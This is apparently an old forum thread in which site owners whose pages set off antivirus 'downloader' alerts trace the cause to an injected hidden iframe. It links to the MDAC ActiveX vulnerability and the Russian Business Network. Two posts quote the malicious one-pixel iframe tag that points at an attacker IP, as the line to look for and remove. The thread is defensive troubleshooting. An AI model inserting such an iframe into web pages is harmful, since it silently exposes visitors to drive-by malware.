when i go to the index page of my own web site, Norton Anti-Virus pops up with the alert that a virus has been detected on my computer, the virus name is *downloader* and it is located in:

c:\windows\tempo...\index[1].htm

it further says that access to the file has been denied.

I've searched for the file and it doesn't exist. My web site's index page is, index.html.

This alert is only coming up when I go to the index page of my web site. I can go to other web site's no problem.

I've done a virus scan but Norton doesn't find the virus through a scan, only when I go to my page.

Can anyone advise what I should do to get rid of this virus? Are people visiting my web site being infected with the virus?

Any help that can be provide would be so greatly appreciated.

Lynda

Can we try your index page to see if we get it, too?

You might have to empty your temporary internet files from the browser.
Know how to do that?

It is not impossible for a hacker to get into your code on a website. You might want to go in and change your password now. Can you open your site in FTP or the authoring program you use and check your code for alteration?

thanks so much for your reply.

I've already deleted cookies, history and all temp internet files. I'll go now and see if I can spot something in my code that has changed or been added.

Edited to delete my web address. I'm nervous now that it will be tampered with again. I've had the site for several years and never had any problem like this.

Hi tatlyn,

Your page is definitly corrupted.
It's like an ActiveX drive by download.

I advise people not to go to your link above unless they
have a high level of protection/savvy.

At least you know it's the page and not your PC.
I and I'm sure others will try to figure out what it is.

Bad out.

yep, this code,

<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

had been added to the very top of my source code. I uploaded my index page (to replace the one that was there) and I'm no longer getting the virus alert.

Does this mean that I was hacked? I'm guessing the added code redirected to a malicious page? Any insight would be very much appreciated.

Lynda

This is what I get from XPL.

MDAC ActiveX code execution (CVE-2006-0003)

Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors. Addressed in Microsoft Security bulletin MS06-014.

Bad out.

I can't explain how the code got there or what it does.
Most all the info available is about protecting yourself,
windows patches yadda yadda yadda.

Microsoft Security Bulletin here-
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

Bad out.

The IP address that was injected on your page goes back to
Russian Business Network, I would say yes your site was hacked.
Probably someone trying to build a Botnet, as the vulnerability
they are trying to exploit deals with remote control of PC's.

Bad out.

Yes, Socket Sheild reports that exploit to me, too.

They were capturing your visitors into a frames page on their server
where the malicious code was residing.

You really need to change the password on your login to the server, and make it HARD to crack, no puppy names or favorite candy-bars. Like
random numbers and letters upper and lower case. And report it to your hosting provider, they have access logs.

I had a site I take care of hacked into couple weeks ago. They put a link to their disgusting site in a footer that showed up on all her pages. I changed the password immediately.

Hi,

I searched the 81.95.146.98 address to see if I could find anyone that has had this same problem and to my good fortune it brought me here.

I have been attacked twice now in about 2 months. Both times it left my index.html inaccessible. I'm thinking because the code was inserted before the html tag, it causes an error and stops reading the rest of the source. That same line of code was inserted first thing on my index page both times.

Is your host Ipowerweb by chance? The reason I am asking is I am trying to determine if it might be a server wide thing or a personalized attack. I have contacted my host (Ipowerweb) about this and they just gave the standard "change your password or maybe remove the FrontPage extensions from your site" answer with no further discussion. Some things that happened during our discussion made me think they knew all about the problem.

My site is all about adware/spyware/virus dangers and I offer repair and clean up services. My target group is local as are most of my visitors. I use print advertising to get the word out. My site pretty much isn't indexed by the search engines and if I do a search for my business name very little if anything comes up in the results. For that reason I find the chances pretty slim that this was a personal attack from someone in Taiwan.

I have done a lot of research trying to figure out what happened. I also came up with the same Russian info on the ip. I did some looking into my access logs for my site and also came up with this:

218.210.11.180 - - [24/Jun/2006:04:59:38 -0700] "GET / HTTP/1.1" 200 622 "file:///E:/00search/SPdealer/SP_dealer2.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322; InfoPath.1)"

I checked the IP and it is from a place called New Century InfoComm Tech. Co., Ltd. out of Taipei, Taiwan. I am assuming that the referrer line coming from a file on the E drive of someone's computer isn't normal.

Do you have access to your logs? If you do maybe you might find the same line also. If you have the ability to ban ip's from you're site this might be one to put in there.

When the first attack happened I checked the source on the Index.html at 81.95.146.98 and found code that seemed to be trying to load a file called Win.exe. I make my living cleaning garbage off of people's computers and I seem to remember that file. I don't think I would have to search these forums too far to find something on it.

Do you have FrontPage extensions installed on your site? If you don't, at least I can rule that out as the possible entry point.

My current theory has someone using that file to get in through a hole of some sort. Maybe even through the FrontPage extensions.

Not really asking a question, just relaying information from my experience with this problem. Ultimately solved my issue by removing the code but it didn't stop it from happening again.

Jim

Hi just read through these posts and I also have the downloader virus on my pc.
If i run norton scan it doesnt detect anything but as soon as i go onto my own website then the virus alert pops up.
I dont understand computer jargon very well and I havent a clue how to get rid of this. I have deleted cookies, temp files etc to no avail. If i go into norton to see where the infected file is it says its in temp internet files but I cant find anything.
Plz could someone help me im pulling my hair out !!

Hi deb,

I think the Norton pop ups are probably telling you it is stopping the infection from your site.

Did you create the site using HTML on your machine or use some
online website builder so you've never even seen the HTML code?

Remove the problem from your webpage you will need to edit the HTML like tatlyn did in the post above.

The line of code you need to remove should look like this
<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

In order to be more specific I would need to have a link to your page so I could view the source code.
But you would have to be the one to use a password
and actually change the code.

Make sense?

If you don't want to make your page public on the forum you could PM your page URL to me.
But I think you will have to register here and sign in to use PM. It's free.

Bad out.

Hello,

It is not limited to one provider or site. It appears to be a new bot which started around ten days ago and is slowly making rounds. See:

http://www.dmgenie.com/smf/index.php?PHPSESSID=29b8967c8a692a61d18ee1aa8e9f2621&topic=3601.new

It has affected my friend's site too (not the above -- another site), and he uses Apache on Linux.

Apparently entry occurs through user's PC, before they upload their data to their hosting provider or server. It does not compromise the server. The virus infects HTML files on a person's PC before they send them to the server, and it puts a malformed iframe tag at the top of the page, an iframe which references a Russian site:

Further up in this thread I found the vulnerability that is exploited
when you get to the russian site and the page loads.

MS security bulletin.
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
It's more ActiveX crap. Thanks MS.

I am immune Firefox, NoScript, XPL.

Thanks for the info.

The same Russian netblock is mentioned here:

http://securityresponse.symantec.com/avcenter/venc/data/backdoor.eterok.c.html?Open